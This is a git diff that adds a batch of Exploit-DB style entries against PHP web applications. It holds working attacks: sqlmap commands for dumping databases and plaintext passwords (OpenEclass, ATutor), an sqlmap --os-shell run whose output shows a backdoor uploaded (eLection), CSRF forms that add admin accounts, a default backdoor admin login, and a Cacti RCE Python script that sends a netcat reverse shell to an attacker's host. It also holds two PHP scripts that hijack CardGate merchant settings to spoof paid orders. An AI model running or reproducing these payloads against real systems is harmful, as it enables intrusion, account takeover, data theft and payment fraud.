+# Date: 2019-11-03
+# Exploit Author: emaragkos 
+# Vendor Homepage: https://www.openeclass.org/
+# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+# Version: 1.7.3 (2007)
+# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
+# CVE : -
+# GUnet OpenEclass <= 1.7.3 E-learning platform - Unauthenticated Blind SQL Injection
+
+You can confirm applications' version by visiting https://URL/info/about.php
+Versions prior to 1.7.3 might also by vulnerable but were not tested.
+
+Source code:
+http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
+http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
+
+Setup instructions:
+http://download.openeclass.org/files/docs/1.7/Install.pdf
+
+Changelog:
+https://download.openeclass.org/files/docs/1.7/CHANGES.txt
+
+Manual:
+https://download.openeclass.org/files/docs/1.7/eClass.pdf
+
+############################################################################
+
+Vulnerability: Post parameter (uname) is vulnerable to time-based blind SQLi 
+
+############################################################################
+
+Steps to reproduce:
+
+1) Visit vulnerable webapp and confirm version is <= 1.7.3 https://URL/info/about.php
+
+2) Configure Burp proxy to intecrept and to capture a login sequence with invalid username/password. (e.g. username:test password:test)
+Your request should look like this:
+POST / HTTP/1.1
+Host: 192.168.1.8
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.8/
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 49
+Connection: close
+Cookie: PHPSESSID=d6gupmerbr0k84st4d7qv9jsl1
+Upgrade-Insecure-Requests: 1
+uname=test&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2
+
+3) Save intercepted request as a file (Right click -> Copy to file -> Save as eclasstestlogin)
+
+4) Load the file to SQLMap  with the use of -r parameter
+sqlmap -r eclasstestlogin --level=5 --risk=3 -v
+SQLMap will find the following payload
+---
+Parameter: uname (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: uname=test' AND (SELECT 5551 FROM (SELECT(SLEEP(5)))IZsi)-- aLyD&pass=test&submit=%C5%DF%F3%EF%E4%EF%F2
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+---
+
+5) Exploit it!
+sqlmap -r eclasstestlogin -v --current-db
+sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] --dump
+sqlmap -r eclasstestlogin -v -D [DB-NAME-GOES-HERE] -T user -C password --dump
+
+6) Bonus! Passwords are stored in plaintext
\ No newline at end of file
diff --git a/exploits/php/webapps/48109.txt b/exploits/php/webapps/48109.txt
new file mode 100644
index 000000000..148db2beb
--- /dev/null
+++ b/exploits/php/webapps/48109.txt
@@ -0,0 +1,21 @@
+# Title : AMSS++ v 4.31 - 'id' SQL Injection
+# Author : indoushka
+# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) 
+# Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar  
+# Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
+# CVE: N/A
+
+# poc :
+
+[+] Dorking İn Google Or Other Search Enggine.
+
+[+] Use payload : /modules/mail/main/maildetail.php?id=174
+
+[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here
+
+
+Greetings to :=========================================================================================================================
+                                                                                                                                      |
+jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
+                                                                                                                                      |
+=======================================================================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48113.txt b/exploits/php/webapps/48113.txt
new file mode 100644
index 000000000..8443e103a
--- /dev/null
+++ b/exploits/php/webapps/48113.txt
@@ -0,0 +1,29 @@
+# Title: CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-02-21
+# Exploit Author: J3rryBl4nks
+# Vendor Homepage: https://sourceforge.net/u/auieo/profile/
+# Software Link: https://sourceforge.net/projects/candidats/files/#Version 2.1.0
+# Tested on Ubuntu 19/Kali Rolling
+
+# The Candid ATS Web application is vulnerable to CSRF to add a new admin user:
+#CSRF Proof of Concept:
+
+    <html>
+      <body>
+      <script>history.pushState('', '', '/')</script>
+        <form action="http://HOSTNAME/Candid/index.php?m=settings&a=addUser" method="POST">
+          <input type="hidden" name="postback" value="postback" />
+          <input type="hidden" name="role" value="none" />
+          <input type="hidden" name="firstName" value="Test" />
+          <input type="hidden" name="lastName" value="User" />
+          <input type="hidden" name="email" value="test&#64;test&#46;com" />
+          <input type="hidden" name="username" value="Test" />
+          <input type="hidden" name="password" value="password" />
+          <input type="hidden" name="retypePassword" value="password" />
+          <input type="hidden" name="roleid" value="2" />
+          <input type="hidden" name="accessLevel" value="500" />
+          <input type="hidden" name="submit" value="Add&#32;User" />
+          <input type="submit" value="Submit request" />
+        </form>
+      </body>
+    </html>
\ No newline at end of file
diff --git a/exploits/php/webapps/48114.txt b/exploits/php/webapps/48114.txt
new file mode 100644
index 000000000..4ae5f0111
--- /dev/null
+++ b/exploits/php/webapps/48114.txt
@@ -0,0 +1,23 @@
+# Title: AMSS++ 4.7 - Backdoor Admin Account
+# Author: indoushka
+# Date: 2020-02-23
+# Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)
+# Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar
+# Dork      : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
+====================================================================================================================================
+
+poc :
+
+
+[+] Dorking İn Google Or Other Search Enggine.
+
+[+] Use Login : admin & 1234
+
+[+] http://127.0.0.1/innoobec/index.php
+
+
+Greetings to :=========================================================================================================================
+                                                                                                                                      |
+jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
+                                                                                                                                      |
+=======================================================================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48117.txt b/exploits/php/webapps/48117.txt
new file mode 100644
index 000000000..92ad9ca8c
--- /dev/null
+++ b/exploits/php/webapps/48117.txt
@@ -0,0 +1,16 @@
+# Exploit Title: ATutor 2.2.4 - 'id' SQL Injection
+# Date: 2020-02-23
+# Exploit Author: Andrey Stoykov
+# Vendor Homepage: https://atutor.github.io/
+# Software Link: https://sourceforge.net/projects/atutor/files/latest/download
+# Version: ATutor 2.2.4
+# Tested on: LAMP on Ubuntu 18.04
+
+Steps to Reproduce:
+
+1) Login as admin user
+2) Browse to the following URL:
+http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17' 
+3) Exploiting with SQLMAP:
+//Must supply valid User-Agent otherwise, there will be errors.
+sqlmap --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --dbms=mysql -u "http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17*" --cookie=<COOKIES HERE>
\ No newline at end of file
diff --git a/exploits/php/webapps/48122.txt b/exploits/php/webapps/48122.txt
new file mode 100644
index 000000000..b95711492
--- /dev/null
+++ b/exploits/php/webapps/48122.txt
@@ -0,0 +1,61 @@
+# Title: eLection 2.0 - 'id' SQL Injection
+# Date: 2020-02-21
+# Exploit Author: J3rryBl4nks
+# Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/
+# Software Link: https://sourceforge.net/projects/election-by-tripath/files/#Version 2.0
+# Tested on Ubuntu 19/Kali Rolling
+
+# The eLection Web application is vulnerable to authenticated SQL Injection which leads to remote code execution:
+# Login to the admin portal and browse to the candidates section. Capture the request in BurpSuite and save it to file:
+
+POST /election/admin/ajax/op_kandidat.php HTTP/1.1
+Host: HOSTNAME
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://HOSTNAME/election/admin/kandidat.php?_
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 17
+Connection: close
+Cookie: el_listing_panitia=5; el_mass_adding=false; el_listing_guru=5; el_listing_siswa=5; PHPSESSID=b4f0c3bbccd80e9d55fbe0269a29f96a; el_lang=en-us
+
+aksi=fetch&id=256
+
+
+
+Send the request to SQLMap with the following parameters:
+
+    sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id
+
+
+SQLMap will find the injection:
+
+    ---
+    Parameter: id (POST)
+        Type: boolean-based blind
+        Title: AND boolean-based blind - WHERE or HAVING clause
+        Payload: aksi=fetch&id=256 AND 8584=8584
+
+        Type: time-based blind
+        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+        Payload: aksi=fetch&id=256 AND (SELECT 8551 FROM (SELECT(SLEEP(5)))nYfJ)
+
+        Type: UNION query
+        Title: Generic UNION query (NULL) - 5 columns
+        Payload: aksi=fetch&id=-9798 UNION ALL SELECT NULL,NULL,CONCAT(0x7170707171,0x676d755461434e486f49475051707357694861534e664f416f434269487042545a76454f5843584b,0x71717a7871),NULL,NULL-- dWMc
+    ---
+
+
+    [09:39:07] [WARNING] unable to automatically parse any web server path
+    [09:39:07] [INFO] trying to upload the file stager on '/opt/lampp/htdocs/election/' via LIMIT 'LINES TERMINATED BY' method
+    [09:39:07] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpumlfm.php
+    [09:39:07] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpbpfkq.php
+    [09:39:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
+    os-shell>
+
+
+Due to the way the setup of the application requires you to change permissions on the directory of the web app, you should be able to get a shell.
+
+https://github.com/J3rryBl4nks/eLection-TriPath-/blob/master/SQLiIntoRCE.md
\ No newline at end of file
diff --git a/exploits/php/webapps/48128.py b/exploits/php/webapps/48128.py
new file mode 100755
index 000000000..0fccb05fa
--- /dev/null
+++ b/exploits/php/webapps/48128.py
@@ -0,0 +1,102 @@
+# Exploit Title: Cacti 1.2.8 - Remote Code Execution
+# Date: 2020-02-03
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE: CVE-2020-8813
+# Vendor Homepage: https://cacti.net/
+# Version: v1.2.8
+# Tested on: CentOS 7.3 / PHP 7.1.33
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+from urllib.parse import quote
+
+warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
+
+
+if len(sys.argv) !=3D 6:
+    print("[~] Usage : ./Cacti-exploit.py url username password ip port")
+    exit()
+
+url =3D sys.argv[1]
+username =3D sys.argv[2]
+password =3D sys.argv[3]
+ip =3D sys.argv[4]
+port =3D sys.argv[5]
+
+def login(token):
+    login_info =3D {
+    "login_username": username,
+    "login_password": password,
+    "action": "login",
+    "__csrf_magic": token
+    }
+    login_request =3D request.post(url+"/index.php", login_info)
+    login_text =3D login_request.text
+    if "Invalid User Name/Password Please Retype" in login_text:
+        return False
+    else:
+        return True
+
+def enable_guest(token):
+    request_info =3D {
+    "id": "3",
+    "section25": "on",
+    "section7": "on",
+    "tab": "realms",
+    "save_component_realm_perms": 1,
+    "action": "save",
+    "__csrf_magic": token
+    }
+    enable_request =3D request.post(url+"/user_admin.php?header=3Dfalse", r=
+equest_info)
+    if enable_request:
+        return True
+    else:
+        return False
+
+def send_exploit():
+    payload =3D ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
+    cookies =3D {'Cacti': quote(payload)}
+    requests.get(url+"/graph_realtime.php?action=3Dinit", cookies=3Dcookies=
+)
+
+request =3D requests.session()
+print("[+]Retrieving login CSRF token")
+page =3D request.get(url+"/index.php")
+html_content =3D page.text
+soup =3D BeautifulSoup(html_content, "html5lib")
+token =3D soup.findAll('input')[0].get("value")
+if token:
+    print("[+]Token Found : %s" % token)
+    print("[+]Sending creds ..")
+    login_status =3D login(token)
+    if login_status:
+        print("[+]Successfully LoggedIn")
+        print("[+]Retrieving CSRF token ..")
+        page =3D request.get(url+"/user_admin.php?action=3Duser_edit&id=3D3=
+&tab=3Drealms")
+        html_content =3D page.text
+        soup =3D BeautifulSoup(html_content, "html5lib")
+        token =3D soup.findAll('input')[1].get("value")
+        if token:
+            print("[+]Making some noise ..")
+            guest_realtime =3D enable_guest(token)
+            if guest_realtime:
+                print("[+]Sending malicous request, check your nc ;)")
+                send_exploit()
+            else:
+                print("[-]Error while activating the malicous account")
+
+        else:
+            print("[-] Unable to retrieve CSRF token from admin page!")
+            exit()
+
+    else:
+        print("[-]Cannot Login!")
+else:
+    print("[-] Unable to retrieve CSRF token!")
+    exit()
\ No newline at end of file
diff --git a/exploits/php/webapps/48134.php b/exploits/php/webapps/48134.php
new file mode 100644
index 000000000..93913c487
--- /dev/null
+++ b/exploits/php/webapps/48134.php
@@ -0,0 +1,174 @@
+# Exploit Title: WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
+# Discovery Date: 2020-02-02
+# Public Disclosure Date: 2020-02-22
+# Exploit Author: GeekHack
+# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
+# Software Link: https://github.com/cardgate/woocommerce/releases/tag/v3.1.15
+# Version: <= 3.1.15
+# Tested on: WordPress 5.3.2 + WooCommerce 3.9.1 + CardGate Payment Gateway Plugin 3.1.15
+# CVE: CVE-2020-8819
+
+<?php
+/*
+  Description:
+
+  Lack of origin authentication (CWE-346) at IPN callback processing function allow (even unauthorized) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store).
+
+  [code ref: https://github.com/cardgate/woocommerce/blob/f2111af7b1a3fd701c1c5916137f3ac09482feeb/cardgate/cardgate.php#L426-L442]
+*/
+
+/*
+  Usage:
+
+  1. Change values of the constants (see below for TARGET & ORDER)
+  2. Host this script somewhere (must be public accessible)
+  3. Register a merchant at https://cardgate.com
+  4. Sign into "My CardGate" dashboard
+  5. Add fake site or choose existing one
+  6. Click "Setup your Webshop" button in site preferences
+  7. Paste the URL of this script into the pop-up window and click "Save"
+  8. The target store now uses the settings of your site, enjoy :]
+
+  P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
+*/
+
+// -------- Options (start) --------
+define('TARGET', 'http://domain.tld'); // without trailing slash, pls
+define('ORDER', 0); // provide non-zero value to automagically spoof order status
+// --------- Options (end) ---------
+
+define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
+define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');
+
+/**
+ * Original function from CardGate API client library (SDK) with minor changes
+ * @param string $sToken_ 
+ * @param bool $bTestmode_ 
+ * @return string
+ */
+function pullConfig($sToken_, $bTestmode_ = FALSE) {
+	if (!is_string($sToken_)) {
+		throw new Exception('invalid token for settings pull: ' . $sToken_);
+	}
+
+	$sResource = "pullconfig/{$sToken_}/";
+	$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;
+
+	$rCh = curl_init();
+	curl_setopt($rCh, CURLOPT_URL, $sUrl);
+	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
+	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
+	curl_setopt($rCh, CURLOPT_HTTPHEADER, [
+		'Content-Type: application/json',
+		'Accept: application/json'
+	]);
+	if ($bTestmode_) {
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
+	} else {
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
+	}
+
+	if (FALSE == ($sResults = curl_exec($rCh))) {
+		$sError = curl_error($rCh);
+		curl_close($rCh);
+		throw new Exception('Client.Request.Curl.Error: ' . $sError);
+	} else {
+		curl_close($rCh);
+	}
+	if (NULL === ($aResults = json_decode($sResults, TRUE))) {
+		throw new Exception('remote gave invalid JSON: ' . $sResults);
+	}
+	if (isset($aResults['error'])) {
+		throw new Exception($aResults['error']['message']);
+	}
+
+	return $aResults;
+}
+
+/**
+ * Original function from CardGate API client library (SDK) with minor changes
+ * @param string $sUrl 
+ * @param array $aData_ 
+ * @param string $sHttpMethod_ 
+ * @return string
+ */
+function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
+	if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
+		throw new Exception('invalid http method: ' . $sHttpMethod_);
+	}
+
+	$rCh = curl_init();
+	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
+	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
+	curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
+	curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
+
+	if ('POST' == $sHttpMethod_) {
+		curl_setopt($rCh, CURLOPT_URL, $sUrl);
+		curl_setopt($rCh, CURLOPT_POST, TRUE);
+		curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
+	} else {
+		$sUrl = $sUrl
+			. (FALSE === strchr($sUrl, '?') ? '?' : '&')
+			. http_build_query($aData_)
+		;
+		curl_setopt($rCh, CURLOPT_URL, $sUrl);
+	}
+
+	$response = curl_exec($rCh);
+	if (FALSE == $response) {
+		$sError = curl_error($rCh);
+		curl_close($rCh);
+		throw new Exception('Client.Request.Curl.Error: ' . $sError);
+	} else {
+		curl_close($rCh);
+	}
+
+	return $response;
+}
+
+if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
+	try {
+		$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
+		$aConfigData = $aResult['pullconfig']['content'];
+		$response = doRequest(TARGET, $_REQUEST);
+		if ($response == $aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200') {
+			if (ORDER) {
+				$payload = [
+					'testmode' => $_REQUEST['testmode'],
+					'reference' => random_int(10000000000, 99999999999) . ORDER,
+					'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
+					'currency' => '',
+					'amount' => 0,
+					'status' => 'success',
+					'code' => 200
+				];
+				$payload['hash'] = md5(
+					(!empty($payload['testmode']) ? 'TEST' : '')
+					. $payload['transaction']
+					. $payload['currency']
+					. $payload['amount']
+					. $payload['reference']
+					. $payload['code']
+					. $aConfigData['site_key']
+				);
+				$response = doRequest(TARGET . '/?cgp_notify=true', $payload);
+				if ($response == $payload['transaction'] . '.' . $payload['code']) {
+					die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+				} else {
+					throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");	
+				}
+			} else {
+				die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+			}
+		} else {
+			throw new Exception("It seems target is not vulnerable ($response)");
+		}
+	} catch (\Exception $oException_) {
+		die(htmlspecialchars($oException_->getMessage()));
+	}
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/48135.php b/exploits/php/webapps/48135.php
new file mode 100644
index 000000000..c7cea2d81
--- /dev/null
+++ b/exploits/php/webapps/48135.php
@@ -0,0 +1,178 @@
+# Exploit Title: Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
+# Discovery Date: 2020-02-02
+# Public Disclosure Date: 2020-02-22
+# Exploit Author: GeekHack
+# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
+# Software Link: https://github.com/cardgate/magento2/releases/tag/v2.0.30
+# Version: <= 2.0.30
+# Tested on: Magento 2.3.4 + CardGate Payment Gateway Module 2.0.30
+# CVE: CVE-2020-8818
+
+<?php
+/*
+  Description:
+
+  Lack of origin authentication (CWE-346) at IPN callback processing function allow (even unauthorized) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store).
+
+  [code ref: https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107]
+*/
+
+/*
+  Usage:
+
+  1. Change values of the constants (see below for TARGET & ORDER*)
+  2. Host this script somewhere (must be public accessible)
+  3. Register a merchant at https://cardgate.com
+  4. Sign into "My CardGate" dashboard
+  5. Add fake site or choose existing one
+  6. Click "Setup your Webshop" button in site preferences
+  7. Paste the URL of this script into the pop-up window and click "Save"
+  8. The target store now uses the settings of your site, enjoy :]
+
+  P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
+*/
+
+// -------- Options (start) --------
+define('TARGET', 'http://domain.tld'); // without trailing slash, pls
+define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status
+define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection)
+define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above)
+define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional)
+// --------- Options (end) ---------
+
+define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
+define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');
+
+/**
+ * Original function from CardGate API client library (SDK) with minor changes
+ * @param string $sToken_ 
+ * @param bool $bTestmode_ 
+ * @return string
+ */
+function pullConfig($sToken_, $bTestmode_ = FALSE) {
+	if (!is_string($sToken_)) {
+		throw new Exception('invalid token for settings pull: ' . $sToken_);
+	}
+
+	$sResource = "pullconfig/{$sToken_}/";
+	$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;
+
+	$rCh = curl_init();
+	curl_setopt($rCh, CURLOPT_URL, $sUrl);
+	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
+	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
+	curl_setopt($rCh, CURLOPT_HTTPHEADER, [
+		'Content-Type: application/json',
+		'Accept: application/json'
+	]);
+	if ($bTestmode_) {
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
+	} else {
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
+		curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
+	}
+
+	if (FALSE == ($sResults = curl_exec($rCh))) {
+		$sError = curl_error($rCh);
+		curl_close($rCh);
+		throw new Exception('Client.Request.Curl.Error: ' . $sError);
+	} else {
+		curl_close($rCh);
+	}
+	if (NULL === ($aResults = json_decode($sResults, TRUE))) {
+		throw new Exception('remote gave invalid JSON: ' . $sResults);
+	}
+	if (isset($aResults['error'])) {
+		throw new Exception($aResults['error']['message']);
+	}
+
+	return $aResults;
+}
+
+/**
+ * Original function from CardGate API client library (SDK) with minor changes
+ * @param string $sUrl 
+ * @param array $aData_ 
+ * @param string $sHttpMethod_ 
+ * @return string
+ */
+function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
+	if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
+		throw new Exception('invalid http method: ' . $sHttpMethod_);
+	}
+
+	$rCh = curl_init();
+	curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
+	curl_setopt($rCh, CURLOPT_HEADER, FALSE);
+	curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
+	curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
+
+	if ('POST' == $sHttpMethod_) {
+		curl_setopt($rCh, CURLOPT_URL, $sUrl);
+		curl_setopt($rCh, CURLOPT_POST, TRUE);
+		curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
+	} else {
+		$sUrl = $sUrl
+			. (FALSE === strchr($sUrl, '?') ? '?' : '&')
+			. http_build_query($aData_)
+		;
+		curl_setopt($rCh, CURLOPT_URL, $sUrl);
+	}
+
+	$response = curl_exec($rCh);
+	if (FALSE == $response) {
+		$sError = curl_error($rCh);
+		curl_close($rCh);
+		throw new Exception('Client.Request.Curl.Error: ' . $sError);
+	} else {
+		curl_close($rCh);
+	}
+
+	return $response;
+}
+
+if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
+	try {
+		$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
+		$aConfigData = $aResult['pullconfig']['content'];
+		$response = doRequest(TARGET . '/cardgate/payment/callback', $_REQUEST, 'GET');
+		if ($response == $aConfigData['merchant_id'] . '.' . $aConfigData['site_id'] . '.200') {
+			if (ORDER) {
+				$payload = [
+					'testmode' => $_REQUEST['testmode'],
+					'reference' => ORDER,
+					'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
+					'currency' => ORDER_CURRENCY,
+					'amount' => ORDER_AMOUNT * 100,
+					'status' => 'success',
+					'code' => 200,
+					'pt' => ORDER_PAYMENT_TYPE
+				];
+				$payload['hash'] = md5(
+					(!empty($payload['testmode']) ? 'TEST' : '')
+					. $payload['transaction']
+					. $payload['currency']
+					. $payload['amount']
+					. $payload['reference']
+					. $payload['code']
+					. $aConfigData['site_key']
+				);
+				$response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET');
+				if ($response == $payload['transaction'] . '.' . $payload['code']) {
+					die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+				} else {
+					throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");	
+				}
+			} else {
+				die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+			}
+		} else {
+			throw new Exception("It seems target is not vulnerable ($response)");
+		}
+	} catch (\Exception $oException_) {
+		die(htmlspecialchars($oException_->getMessage()));
+	}
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/48138.txt b/exploits/php/webapps/48138.txt
new file mode 100644
index 000000000..106e3ba70
--- /dev/null
+++ b/exploits/php/webapps/48138.txt
@@ -0,0 +1,21 @@
+# Title: PhpIX 2012 Professional - 'id' SQL Injection
+# Date: 2020-02-26
+# Author: indoushka
+# Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)
+# Vendor    : http://www.allhandsmarketing.com/
+
+# poc :
+
+
+[+] Dorking İn Google Or Other Search Enggine.
+
+[+] /product_detail.php?id=448578 <====| inject here
+
+[+] http://www.pcollectionnecktie.com/sandbox/ <====| Login
+
+
+Greetings to :=========================================================================================================================
+                                                                                                                                      |
+jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
+                                                                                                                                      |
+=======================================================================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48141.txt b/exploits/php/webapps/48141.txt
new file mode 100644
index 000000000..cf301b0a7
--- /dev/null
+++ b/exploits/php/webapps/48141.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)
+# Description: Operator Can Change Role User Type to admin
+# Date: 2020-02-26
+# Exploit Author: Meisam Monsef
+# Vendor Homepage: https://www.bdtask.com/business-live-chat-software.php
+# Version: V-1.0
+# Tested on: ubuntu
+
+Exploit :
+1 - please login or create account
+2 - open exploit.html in browser
+3 - change you user id input for Change Role User Type to admin
+4 - fill input data (fname - lname - email)
+5 - click Update Button
+6 - logout account
+7 - login again you are admin & Enjoying
+
+<form action="https://TARGET/admin/user/users/create"
+enctype="multipart/form-data" method="post" accept-charset="utf-8">
+user_id :
+<input type="text" name="user_id" value="1"> <!-- change your user_id -->
+<br>
+fname :
+<input type="text" name="fname" value="" /> <!-- fill your first name -->
+<br>
+lname :
+<input type="text" name="lname" value="" />  <!-- fill your last name -->
+<br>
+email :
+<input type="text" name="email" value="" />  <!-- fill your email -->
+<br>
+user_type :
+<input type="text" name="user_type" value="1" />
+<br>
+status :
+<input type="text" name="status" value="1" />
+<br>
+<button type="submit">Update</button>
+</form>
\ No newline at end of file
diff --git a/exploits/php/webapps/48151.txt b/exploits/php/webapps/48151.txt
new file mode 100644
index 000000000..091e7db36
--- /dev/null
+++ b/exploits/php/webapps/48151.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
+# Date: 2020-01-30
+# Vendor Homepage: https://www.themeum.com/product/tutor-lms/
+# Vendor Changelog: https://wordpress.org/plugins/tutor/#developers
+# Exploit Author: Jinson Varghese Behanan
+# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
+# Author Homepage: https://www.jinsonvarghese.com
+# Version: 1.5.2 and below
+# CVE : CVE-2020-8615
+
+# 1. Description
+
+# The Tutor LMS WordPress plugin is a feature-packed plugin that enables users to create and sell courses. 
+# An attacker can use CSRF to register themselves as an instructor or block other legit instructors. 
+# Consequently, if the option to create courses without admin approval is enabled on the plugin’s settings 
+# page, the attacker will be able to create courses directly as well. All WordPress websites 
+# using Tutor LMS version 1.5.2 and below are affected.
+
+# 2. Proof of Concept
+
